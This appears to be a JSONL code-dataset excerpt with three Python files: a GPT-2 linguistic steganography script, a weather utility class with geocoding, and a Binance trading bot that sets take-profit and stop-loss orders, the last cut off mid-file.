+{"seq_id":"391064093","text":"import numpy as np\nimport bitarray\nimport sys\nimport re\nimport math\nimport argparse\nimport csv\nfrom utils import get_model, encode_context, dfs\n\nfrom arithmetic import encode_arithmetic, decode_arithmetic\nfrom block_baseline import get_bins, encode_block, decode_block\nfrom huffman_baseline import encode_huffman, decode_huffman\nfrom sample import sample\nfrom saac import encode_saac, decode_saac\n# from base64 import *\nimport re\nimport pandas as pd\n\n# -----------------------------------------------------\n# | Harvard NLP project edited by Kieran |\n# | Feature SAAC, Arithmetic, Bins, Huffman implemen- |\n# | tations on linguistic Steganography based on Text |\n# | Generation Language Model. The Basic openAI GPT-2 |\n# | language model have been included in the directo- |\n# | ry pretrained_model. Usage mentioned below. |\n# -----------------------------------------------------\n\n# Usage:\n# python run_single.py [-mode] [-unicode_enc] [-block_size] [-temp] [-precision] [-topk] [-nucleus] [-device] [-finish_sent] [-delta] [-language_model]\n\n# Simply Usage:\n# python run_single.py\n# python run_single.py -mode \"huffman\"\n# python run_single.py -mode \"saac\" -nucleus 0.98\n\n# API likely:\n# message_str: string to be hidden. 需要被隐写的人名,比如 'Kieran'\n# context: the context related to the text generation procedure. 上下文CONTEXT,此处更改为使用同目录中其他文件\n# message: Binary stream Based on message_str. text --arithmetic encode--> binary stream 根据隐写信息(人名)编码得到的二进制流\n# text: covertext. generated text that contains secret information. 生成的含有隐写信息的文本 COVERTEXT\n# message_rec: binary stream extracted from stego_text. 对隐写文本进行隐写提取得到的二进制流\n# reconst: Decoded text. message_rec --arithmetic decode--> reconst 将隐写提取得到的二进制流进行解码得到的结果,合法输入应该也为人名\n# covertext_list: 将所有人名变化得到的covertext保存到的一个list中,可供调用。\n\n# env: Windows 10, python 3.6.12, torch 1.0.1, pytorch_transformers 1.1.0,\n# bitarray 1.0.1, CUDA 10, GTX1050.\n\n\ndef main(args):\n # Initial process\n args = vars(args)\n unicode_enc = args['unicode_enc'] # 选择编码方式 \n mode = args['mode'] # 选择隐写算法\n block_size = args['block_size'] # 隐写参数batch_size\n temp = args['temp'] # 隐写参数TEMPERATURE,注意下文中最好不要新建temp变量\n precision = args['precision'] # 隐写参数\n topk = args['topk'] # 文本生成相关参数\n device = args['device'] # device,文本生成相关参数,选择GPU/CPU,默认'cuda'\n finish_sent = args['finish_sent'] # 隐写参数\n nucleus = args['nucleus'] # saac相关隐写参数\n delta = args['delta'] # saac相关隐写参数\n model_name = args['language_model'] # 文本生成模型\n context_file = args['context_file'] # 上下文文件的位置\n message_str = args['name']\n # sample_tokens = 100 # 测试用变量\n\n # PARAMETERS 默认第一次的隐写信息(人名)\n # message_str = \"Chhenl\" # string to be hidden.\n\n # VALIDATE PARAMETERS 验证隐写算法\n if mode not in ['arithmetic', 'huffman', 'bins', 'saac']:\n raise NotImplementedError\n \n # 打印隐写信息(人名)\n print(\"Default plain_text is \", message_str)\n \n # 读取上下文\n f = open(context_file, 'r', encoding='utf-8')\n context = f.read()\n f.close()\n print(\"sample context is \", context) # related to the text generation procedure.\n\n # 加载文本生成模型\n print(\"loading GPT-2 LM to GPU\")\n enc, model = get_model(model_name=model_name)\n print(\"finish loading !\")\n\n print(\"implication of {}\".format(mode))\n \n # bins隐写算法的处理\n if mode == 'bins':\n bin2words, words2bin = get_bins(len(enc.encoder), block_size)\n\n # saac隐写算法的处理\n if delta and mode == \"saac\":\n nucleus = 2 ** (-1.0 * delta)\n\n\n\n # 以下注释都为旧调试过程中的注释\n # fix situation: directly encode the text.\n # print(\"directly encode the plain txt:\\n\", enc.encode(message_str))\n # print(\"Decode back:\\n\", enc.decode(enc.encode(message_str)))\n\n # can ensure the problem arise in the arithmetic_decode as well as the arithmetic_encode function.\n\n # ----------------------start test----------------------------\n # test_str = \"hello world.\"\n # print(\"test_str = \", test_str)\n # out = enc.encode(test_str)\n # print(\"out = \", out)\n # decode_str = enc.decode(out)\n # print(\"decode_str = \", decode_str)\n # print(\"enc.encode(decode_str) = \", enc.encode(decode_str))\n # ----------------------stop test-----------------------------\n\n # Archive Basic Initialization----------------------------------\n # print(\"plain_text is {}\".format(message_str))\n # unicode_enc = False\n # mode = 'huffman'\n # block_size = 3 # for huffman and bins\n # temp = 0.9 # for arithmetic\n # precision = 26 # for arithmetic\n # sample_tokens = 100 # for sample, delete sample\n # topk = 300\n # device = 'cuda'\n # finish_sent=False # whether or not to force finish sent. If so, stats displayed will be for non-finished sentence\n # nucleus = 0.95\n # Archive Basic Initialization----------------------------------\n\n\n\n\n\n\n first_flag = 1 # 对下文中默认处理的标志\n context_tokens = encode_context(context, enc) # 对context进行语言模型相关的编码\n\n while(1):\n # ---此处在循环中,则会不断等待输入隐写信息(人名)--------------------------------------\n # ------------------------------------------------------------------------------------\n # list_for_bpw = [] # 用于计算Bits/word参数\n # list_for_DKL = [] # 用于计算KL参数\n # list_for_seq = [] # 用于标记\n \n if first_flag == 0:\n message_str = input(\"Please reenter a new plaintext:\")\n # output_amount = len(message_str)\n \n # 得到对隐写信息(人名)的大小写集合\n message_str = message_str.upper()\n arr=list(message_str)\n generated_array = dfs(arr,0,[])\n \n first_flag = 0\n covertext_list = []\n \n for temp_count in range(0, len(generated_array)):\n # First encode message to uniform bits, without any context\n # (not essential this is arithmetic vs ascii, but it's more efficient when the message is natural language)\n \n # if temp_count > 10:\n # break # 测试时最好完成修正,此处限制输出10个COVERTEXT\n \n print(\"=\"*80)\n print(\"Altering the #{} msg_str:\".format(temp_count), message_str)\n message_str = generated_array[temp_count] # 选择一个隐写信息(比如 KiErAn)\n\n\n\n # 得到message。即上文所述的字节流\n if unicode_enc:\n ba = bitarray.bitarray()\n ba.frombytes(message_str.encode('utf-8'))\n message = ba.tolist()\n else:\n message_ctx = [enc.encoder['<|endoftext|>']]\n message_str += ''\n message = decode_arithmetic(model, enc, message_str, message_ctx, precision=40, topk=60000)\n\n\n # print(\"First encode the text to a bit sequence!\")\n # print(message) # the binary stream. text--arithmetic-->binary stream\n # print(\"the length is {}\".format(len(message)))\n\n # Next encode bits into cover text, using arbitrary context\n \n\n # 下方完成隐写算法,使用不同隐写算法将字节流嵌入进生成文本中,得到out经过GPT2的解码器得到COVERTEXT\n Hq = 0\n if mode == 'arithmetic':\n out, nll, kl, words_per_bit, Hq = encode_arithmetic(model, enc, message, context_tokens, temp=temp, finish_sent=finish_sent, precision=precision, topk=topk)\n elif mode == 'huffman':\n out, nll, kl, words_per_bit = encode_huffman(model, enc, message, context_tokens, block_size, finish_sent=finish_sent)\n elif mode == 'bins':\n out, nll, kl, words_per_bit = encode_block(model, enc, message, context_tokens, block_size, bin2words, words2bin, finish_sent=finish_sent)\n elif mode == 'saac':\n out, nll, kl, words_per_bit, Hq, topk_list, case_studies = encode_saac(model, enc, message, context_tokens, device=device, temp=temp, precision=precision, topk=topk, nucleus=nucleus)\n # add thing contains device='cuda', temp=1.0, precision=26, topk=50, nucleus=0.95.\n covertext = enc.decode(out)\n covertext_list.append(covertext) # 将所有COVERTEXT保存到一个结构中,可供调用\n\n\n\n # list_for_bpw.append(1/words_per_bit) # 用于计算参数\n # list_for_DKL.append(kl) # 用于计算参数\n # list_for_seq.append(temp_count) \n # print(\"=\"*40 + \" Encoding \" + \"=\"*40)\n\n # 打印结果,COVERTEXT,此处可以将covertext进行提取。\n print('#{} generated covertext:\\n'.format(temp_count), covertext) # covertext. generated covertext that contains secret information.\n print('ppl: %0.2f, kl: %0.3f, words/bit: %0.2f, bits/word: %0.2f, entropy: %.2f' % (math.exp(nll), kl, words_per_bit, 1/words_per_bit, Hq/0.69315))\n \n\n\n\n # -----------------------------------------------------------------------------------\n # 以下为隐写提取过程, 选择不同的隐写算法对covertext进行提取,得到字节流 MESSAGE_REC\n # Decode binary message from bits using the same arbitrary context\n \n # 下方在编写时可能会使用到,这里先注释掉,接收人将自己的名字和covertext输入进行判定。\n # input_name = input(\"Please input ur name:\")\n # input_covertext = input(\"Please input the covertext:\")\n # covertext = input_covertext\n\n\n if mode == 'arithmetic':\n message_rec = decode_arithmetic(model, enc, covertext, context_tokens, temp=temp, precision=precision, topk=topk)\n elif mode == 'huffman':\n message_rec = decode_huffman(model, enc, covertext, context_tokens, block_size)\n elif mode == 'bins':\n message_rec = decode_block(model, enc, covertext, context_tokens, block_size, bin2words, words2bin)\n elif mode == 'saac':\n message_rec = decode_saac(model, enc, covertext, context_tokens, device=device, temp=temp, precision=precision, topk=topk, nucleus=nucleus)\n\n # print(\"=\"*40 + \" Recovered Message \" + \"=\"*40)\n # print(message_rec) # binary stream extracted from stego_text.\n # print(\"=\" * 80)\n # Finally map message bits back to original text\n \n # 对字节流进行解码操作,最终得到的reconst变量即为最终隐写提取所得,正常使用应为人名。\n if unicode_enc:\n message_rec = [bool(item) for item in message_rec]\n ba = bitarray.bitarray(message_rec)\n reconst = ba.tobytes().decode('utf-8', 'ignore')\n else:\n reconst = encode_arithmetic(model, enc, message_rec, message_ctx, precision=40, topk=60000)\n # reconst = encode_arithmetic(model, enc, message_rec, message_ctx, temp=temp, precision=precision, topk=topk)\n # print(\"reconst[0] is\", format(reconst[0]))\n reconst = enc.decode(reconst[0])\n print(\"The decode text is \")\n print(reconst[0:-5]) # Decoded text. message_rec --arithmetic decode--> reconst\n \n # 这里完成基本的判断,判断此时的covertext是否指向此人名,这里对应输入设置。\n # extracted_name = reconst.upper()[0:-5]\n # if extracted_name is input_name.upper():\n # print(\"YOU ARE THE ONE! (^..^)\")\n # else:\n # print(\"PITY. ('..') \")\n\n\n\n\n\n # dataframe = pd.DataFrame({'Times':list_for_seq, 'Dkl':list_for_DKL, 'Bits/Word':list_for_bpw})\n # dataframe.to_csv(\"test_{}_temp_{}_topk_{}_prec_{}_nucleus_{:.3}.csv\".format(mode, temp, topk, precision, nucleus), index=False, sep=',')\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-unicode_enc\", type=bool, default=False, help=\"Whether open unicode encoding method.\")\n parser.add_argument(\"-mode\", type=str, default=\"saac\", help=\"Steganography Method.\")\n parser.add_argument(\"-block_size\", type=int, default=3, help=\"Block_size is for Huffman and Bins.\")\n parser.add_argument(\"-temp\", type=float, default=0.9, help=\"Temperature, for arithmetic and saac.\")\n parser.add_argument(\"-precision\", type=int, default=26, help=\"Precision is for arithmetic and saac.\")\n parser.add_argument(\"-topk\", type=int, default=300, help=\"top K Token, for arithmetic and saac.\")\n parser.add_argument(\"-nucleus\", type=float, default=0.95, help=\"Nucleus is for saac.\")\n parser.add_argument(\"-device\", type=str, default=\"cuda\", help=\"The basic calculator when applying model.\")\n parser.add_argument(\"-finish_sent\", type=bool, default=False, help=\"\")\n parser.add_argument(\"-delta\", type=float, default=0.01, help=\"delta for adaptive arithemtic encoding method.\")\n parser.add_argument(\"-language_model\", type=str, default=\"gpt2\", help=\"Basic Languages to generate text.\")\n parser.add_argument(\"-context_file\", type=str, default=\"./context.txt\", help=\"the basic context file\")\n parser.add_argument(\"-name\", type=str, default=\"Gogo\", help=\"Name, plz.\")\n args = parser.parse_args()\n # main()\n main(args)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# parser = argparse.ArgumentParser()\n# parser.add_argument(\"-plaintext\", type=str, default=\"\", help=\"your secret plaintext, use a double-quotes if necessary\")\n# parser.add_argument(\"-context\", type=str, default=\"\", help=\"context used for steganography, use a double-quotes if necessary\")\n# parser.add_argument(\"-encrypt\", type=str, default=\"arithmetic\", choices=[\"arithmetic\", \"utf8\"])\n# parser.add_argument(\"-encode\", type=str, default=\"bins\", choices=[\"bins\", \"huffman\", \"arithmetic\", \"saac\"])\n# parser.add_argument(\"-lm\", type=str, default=\"gpt2\")\n# parser.add_argument(\"-device\", type=str, default=\"0\", help=\"your gpu device id\")\n# parser.add_argument(\"-block_size\", type=int, default=4, help=\"block_size for bin/huffman encoding method\")\n# parser.add_argument(\"-precision\", type=int, default=26, help=\"precision for arithmetic encoding method\")\n# parser.add_argument(\"-temp\", type=float, default=1.0, help=\"temperature for arithemtic/huffman encoding method\")\n# parser.add_argument(\"-topK\", type=int, default=50, help=\"topK for arithemtic encoding method\")\n# parser.add_argument(\"-nucleus\", type=float, default=0.95, help=\"neclues for adaptive arithemtic encoding method\")\n# parser.add_argument(\"-delta\", type=float, default=0.01, help=\"delta for adaptive arithemtic encoding method\")\n# args = parser.parse_args()\n# main(args)\n\n# basic parameters include unicode_enc, mode, block_size, temp, precision, sample_tokens, topk, device, finish_sent, nucleus\n\n\n# 12.30, fulfil the basic function api for further implementation.\n\n\n\n\n\n\n\n\n\n# result:\n# bins:\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\n\n# arithmetic:\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n# huffman:\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\n# [0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]\n\n# 第一处:message = decode_arithmetic(model, enc, message_str, message_ctx, precision=40, topk=60000)\n# 第二处:out, nll, kl, words_per_bit, Hq = encode_arithmetic(model, enc, message, context_tokens, temp=temp, finish_sent=finish_sent, precision=precision, topk=topk)\n# 前一个:message_rec = decode_arithmetic(model, enc, text, context_tokens, temp=temp, precision=precision, topk=topk)\n# 后一个:reconst = encode_arithmetic(model, enc, message_rec, message_ctx, precision=40, topk=60000)\n\n\n# [1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n# [1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]","sub_path":"NeuralSteganography-master1/run_single_bak.py","file_name":"run_single_bak.py","file_ext":"py","file_size_in_byte":19211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"642361478","text":"import os\nimport json\nimport platform\nimport datetime\nimport binascii\n\nfrom threading import RLock\nfrom geopy import geocoders\n\nimport logging\nlogger = logging.getLogger()\n\nclass WeatherUtils:\n __lock = RLock()\n __zip_mapping = {}\n\n def get_direction(bearing):\n coords = {\n 'N': [0, 22.5],\n 'NE': [22.5, 67.5],\n 'E': [67.5, 112.5],\n 'SE': [112.5, 157.5],\n 'S': [157.5, 202.5],\n 'SW': [202.5, 247.5],\n 'W': [247.5, 292.5],\n 'NW': [292.5, 337.5],\n 'N': [337.5, 360]\n }\n for k,v in coords.items():\n if bearing >= v[0] and bearing < v[1]:\n return k\n return \"\"\n\n def get_am_pm_hour_str(timestamp):\n if platform.system() == 'Windows':\n return timestamp.strftime('%#I %p')\n else:\n return timestamp.strftime('%-I %p')\n\n def load_api_dump(url):\n if 'DEBUG' in os.environ:\n hash = binascii.crc32(url.encode('utf8'))\n debug_json = f\"/tmp/{hash}.json\"\n if os.path.exists(debug_json):\n with open(debug_json) as r:\n return json.load(r)\n\n def save_api_dump(url, r):\n if 'DEBUG' in os.environ or os.path.exists('/tmp/dump-api.flag'):\n hash = binascii.crc32(url.encode('utf8'))\n debug_json = f\"/tmp/{hash}.json\"\n with open(debug_json, \"w\") as w:\n w.write(f\"URL: {url}\\r\\n\")\n w.write(r.text)\n\n def get_gps_coordinates(zip_code):\n try:\n WeatherUtils.__lock.acquire()\n if zip_code in WeatherUtils.__zip_mapping:\n return WeatherUtils.__zip_mapping[zip_code]\n\n # geopy cannot specify zip code explicitly, so not accurate\n geolocator = geocoders.Nominatim(user_agent=\"Nook-Weather\")\n location = geolocator.geocode({\"country\":\"us\", \"postalcode\":zip_code})\n coordinates = f\"{location.latitude},{location.longitude}\"\n WeatherUtils.__zip_mapping[zip_code] = coordinates\n return coordinates\n except Exception as e:\n logger.error(f\"Failed to get gps coordinates from zip {zip_code}: {e}\")\n return None\n finally:\n WeatherUtils.__lock.release()\n","sub_path":"nook-weather/weather/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"45391548","text":"from binance.client import Client\nfrom binance.enums import *\nfrom utils.get_mac_id import get_mac\nfrom datetime import datetime\nimport api.index as api\nfrom binance.exceptions import BinanceAPIException, BinanceOrderUnknownSymbolException\nimport scripts.telegram as tel\nfrom utils.extract_coin import extract\nfrom termcolor import colored\nfrom telethon import TelegramClient, events\nimport time\nimport re\nimport math\nimport webbrowser\n\n\nclass Bot:\n def __init__(self, data, isTrial):\n self.api_key = data[\"apiKey\"]\n self.api_secret = data[\"secret\"]\n self.useTelegramCapture = str(data[\"useTelegramCapture\"]).lower()\n self.quoteOrderQty = data[\"BtcToSpend\"]\n self.take_profit = str(data[\"takeProfit\"]).lower()\n self.takeProfitAt = data[\"takeProfitAt\"]\n self.takeProfitLimit = data[\"takeProfitLimit\"]\n self.stopLoss = str(data[\"stopLoss\"]).lower()\n self.stopLossAt = data[\"stopLossAt\"]\n self.stopLossLimit = data[\"stopLossLimit\"]\n self.timeout = data[\"Timeout\"]\n self.client = Client(self.api_key, self.api_secret)\n self.isTrial = isTrial\n self.tp_order_id, self.sl_order_id, self.oco_order = False, False, False\n self.tp_triggered, self.sl_triggered = False, False\n if self.useTelegramCapture == \"true\":\n self.initialise_telegram_client(data)\n\n def initialise_telegram_client(self, data):\n self.telegram_App_id = data[\"telegram_App_id\"]\n self.telegram_api_hash = data[\"telegram_api_hash\"]\n self.channel_id = data[\"channel_id\"]\n self.Test_channel_id = data[\"Test_channel_id\"]\n self.coin_extract_status = False\n self.coin_symbol = \"\"\n self.telegram_client = TelegramClient(\n \"anon\", self.telegram_App_id, self.telegram_api_hash\n )\n\n def create_market_order(self):\n try:\n order = self.client.order_market_buy(\n symbol=self.coin_symbol,\n quoteOrderQty=self.quoteOrderQty,\n )\n return order\n except BinanceAPIException as e:\n print(colored(f\"Market Buy Error - {e}\", \"red\"))\n\n def create_market_order_sell(self):\n try:\n order = self.client.order_market_sell(\n symbol=self.coin_symbol,\n quantity=self.quantity_brought,\n )\n return order\n except BinanceAPIException as e:\n print(colored(f\"Market Sell Error - {e}\", \"red\"))\n\n def float_precision(self, f, n):\n n = int(math.log10(1 / float(n)))\n f = math.floor(float(f) * 10 ** n) / 10 ** n\n f = \"{:0.0{}f}\".format(float(f), n)\n return str(int(f)) if int(n) == 0 else f\n\n def get_price(self):\n price = None\n tickers = self.client.get_all_tickers()\n for ticker in tickers:\n if ticker[\"symbol\"] == self.coin_symbol:\n price = float(ticker[\"price\"])\n return price\n\n def get_info(self):\n try:\n tick_size = None\n step_size = None\n symbol_info = self.client.get_symbol_info(self.coin_symbol)\n for filt in symbol_info[\"filters\"]:\n if filt[\"filterType\"] == \"PRICE_FILTER\":\n tick_size = float(filt[\"tickSize\"])\n elif filt[\"filterType\"] == \"LOT_SIZE\":\n step_size = float(filt[\"stepSize\"])\n return tick_size, step_size\n except TypeError as e:\n print(colored(f\"Wrong Coin Name Entered - {e}\", \"red\"))\n\n def get_asset_info(self):\n try:\n self.tick_size, self.step_size= self.get_info()\n except TypeError as e:\n print(colored(f\"Wrong Coin Name Entered - {e}\", \"red\"))\n\n def Average(self, lst):\n return sum(lst) / len(lst)\n\n def calculate_target_price(self, price, percent_change, loss):\n if loss:\n final_price = price - ((percent_change / 100) * price)\n else:\n final_price = price + ((percent_change / 100) * price)\n return final_price\n\n def set_take_profit(self):\n # PERCENT_PRICE Filter Check\n if(self.takeProfitAt>=399):\n print(colored('WARNING : Your Take Profit value is too high, Binance allows only 400% TP to be set','yellow'))\n self.takeProfitAt=398\n if(self.takeProfitLimit>=399):\n print(colored('WARNING : Your Take Profit Limit value is too high, Binance allows only 400% TP to be set','yellow'))\n self.takeProfitLimit=398\n take_profit_price = self.calculate_target_price(\n self.price_brought, self.takeProfitLimit, False\n )\n stop_price = self.calculate_target_price(\n self.price_brought, self.takeProfitAt, False\n )\n price_formatted = self.float_precision(take_profit_price, self.tick_size)\n stop_price_formatted = self.float_precision(stop_price, self.tick_size)\n try:\n order_take_ptf = self.client.create_order(\n symbol=self.coin_symbol,\n side=SIDE_SELL,\n type=ORDER_TYPE_TAKE_PROFIT_LIMIT,\n quantity=self.quantity_brought,\n price=price_formatted,\n stopPrice=stop_price_formatted,\n timeInForce=TIME_IN_FORCE_GTC,\n )\n return order_take_ptf\n except BinanceAPIException as e:\n print(colored(f\"Take Profit Error - {e}\", \"red\"))\n\n def set_stop_loss(self):\n # PERCENT_PRICE Filter Check\n if(self.stopLossAt>=80):\n print(colored('WARNING : Your Stop Loss value is too high, Binance allows only 80% stopLoss to be set','yellow'))\n self.stopLossAt=79\n if(self.stopLossLimit>=80):\n print(colored('WARNING : Your Stop Loss Limit value is too high, Binance allows only 80% stopLoss to be set','yellow'))\n self.stopLossLimit=79\n stop_loss_price = self.calculate_target_price(\n self.price_brought, self.stopLossLimit, True\n )\n stop_price = self.calculate_target_price(\n self.price_brought, self.stopLossAt, True\n )\n price_formatted = self.float_precision(stop_loss_price, self.tick_size)\n stop_price_formatted = self.float_precision(stop_price, self.tick_size)\n try:\n order_stop_loss = self.client.create_order(\n symbol=self.coin_symbol,\n side=SIDE_SELL,\n type=ORDER_TYPE_STOP_LOSS_LIMIT,\n quantity=self.quantity_brought,\n price=price_formatted,\n stopPrice=stop_price_formatted,\n timeInForce=TIME_IN_FORCE_GTC,\n )\n return order_stop_loss\n except BinanceAPIException as e:\n print(colored(f\"Stop Loss Error - {e}\", \"red\"))\n\n def set_oco_order(self):\n take_profit_price = self.float_precision(\n self.calculate_target_price(\n self.price_brought, self.takeProfitLimit, False\n ),\n self.tick_size,\n )\n stop_loss_price = self.float_precision(\n self.calculate_target_price(self.price_brought, self.stopLossLimit, True),\n self.tick_size,\n )\n stop_price = self.float_precision(\n self.calculate_target_price(self.price_brought, self.stopLossAt, True),\n self.tick_size,\n )\n try:\n oco_order = self.client.create_oco_order(\n symbol=self.coin_symbol,\n side=SIDE_SELL,\n stopLimitTimeInForce=TIME_IN_FORCE_GTC,\n quantity=self.quantity_brought,\n stopPrice=stop_price,\n stopLimitPrice=stop_loss_price,\n price=take_profit_price,\n )\n return oco_order\n except BinanceAPIException as e:\n print(colored(f\"OCO order Error - {e}\", \"red\"))\n\n def openCurrencyChart(self):\n curreny_url_binance = (\n f\"https://www.binance.com/en/trade/{self.coin_currency}_BTC?layout=basic\"\n )\n webbrowser.open(curreny_url_binance)\n\n def start(self):\n self.coin_currency = self.coin_symbol[0 : len(self.coin_symbol) - 3]\n self.get_asset_info()\n market_order = self.create_market_order()\n price_brought_list, commission = [], 0\n if market_order:\n for i in market_order[\"fills\"]:\n price_brought_list.append(float(i[\"price\"]))\n if i[\"commissionAsset\"] == self.coin_currency:\n commission += float(i[\"commission\"])\n self.quantity_brought = float(\n self.float_precision(\n float(market_order[\"executedQty\"]) - commission, self.step_size\n )\n )\n self.price_brought = self.Average(price_brought_list)\n\n print(\n f\"Market Buy Successful at price {colored(self.price_brought,'green')} and quantity brought - {colored(self.quantity_brought,'green')}\"\n )\n if self.take_profit == \"true\" and self.stopLoss != \"true\":\n take_profit_order = self.set_take_profit()\n if take_profit_order:\n print(colored(f\"Take Profit Successfully set!\", \"green\"))\n self.tp_order_id = take_profit_order[\"orderId\"]\n if self.stopLoss == \"true\" and self.take_profit != \"true\":\n stop_loss_order = self.set_stop_loss()\n if stop_loss_order:\n print(colored(f\"Stop Loss Successfully set!\", \"green\"))\n self.sl_order_id = stop_loss_order[\"orderId\"]\n if self.take_profit == \"true\" and self.stopLoss == \"true\":\n self.oco_order = self.set_oco_order()\n if self.oco_order:\n print(\n colored(f\"Take Profit and Stop Loss Successfully Set!\", \"green\")\n )\n self.openCurrencyChart()\n if self.timeout > 0:\n t = self.timeout\n while t:\n mins, secs = divmod(t, 60)\n timer = \"{:02d}:{:02d}\".format(mins, secs)\n print(colored(timer, \"yellow\"), end=\"\\r\")\n time.sleep(1)\n t -= 1\n if self.tp_order_id:\n try:\n order_status_tp = self.client.get_order(\n symbol=self.coin_symbol, orderId=self.tp_order_id\n )\n if order_status_tp[\"status\"] == \"FILLED\":\n self.tp_triggered = True\n except BinanceAPIException as e:\n print(colored(f\"Failed to get TP Order - {e}\", \"red\"))\n elif self.sl_order_id:\n try:\n order_status_sl = self.client.get_order(\n symbol=self.coin_symbol, orderId=self.sl_order_id\n )\n if order_status_sl[\"status\"] == \"FILLED\":\n self.sl_triggered = True\n except BinanceAPIException as e:\n print(colored(f\"Failed to get SL Order - {e}\", \"red\"))\n 